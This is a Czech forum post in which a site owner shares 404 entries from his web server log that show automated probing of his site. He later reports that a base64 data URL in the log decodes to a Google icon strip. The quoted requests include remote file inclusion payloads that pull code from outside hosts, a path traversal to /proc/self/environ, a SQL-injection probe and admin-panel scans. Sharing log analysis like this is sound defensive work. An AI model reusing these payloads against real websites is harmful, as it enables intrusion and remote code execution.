tak jsem se díval na svůj web do logu a vyfiltroval jsem si to podle statusu 404 stránka neexistuje a zde je pár ukázek, jak se během několika málo dní objeví celá řada pokusů o identifikaci na čem web běží a pokůsů o hack:
GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://parepare.nab.su/parepare.jpg?? - v různých variantách za tím =
GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://parepare.nab.su/parepare.jpg?? - zase řada různých verzí
GET /admin/banner_manager.php/login.php
GET /admin/categories.php/login.php
GET /admin/file_manager.php/login.php
GET /administrator/index.php
GET /CHANGELOG.txt
GET /article.php?id_article=58'
GET /misc/tabledrag.js
GET /sitecore/login
GET //index.php?r=../../../../../../../../../../../../..//proc/self/environ%0000
GET /index.php?nic=http://www.menrs.gov.mg/coopuniv/vero.txt?
GET /umbraco/css/umbracoGui.css
POST /contact.php
a tyhle dotazy se objevují i v různých podadresářích, takže to zkouší jestli systém není někde zanořen
a zajímavé je také tohle:
GET /url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEYAAAAOCAYAAACSJWqFAAA.... ...K5CYII%3d)
které má 1664 set znaků v těch datech, je to tam několikrát a ty data jsou pokaždý stejný, i když se liší ip a user agent a ani po dekódování mi z toho nevylezl obrázek, ale možná mám někde chybu při dekódování
UPDATE : tak před base64 dekodovanim se to musi jeste url dekodovat, kvuli několika znakům %xx a pak z toho je proužek ikon od google [
http://www.phprs.net/forum/file.php?5,file=320] jen je to potřeba přejmenovat na png, neboť to sem vložit nejde
Celkem upraveno 2×. Poslední úprava MirekS v 05.09.2011 17:24.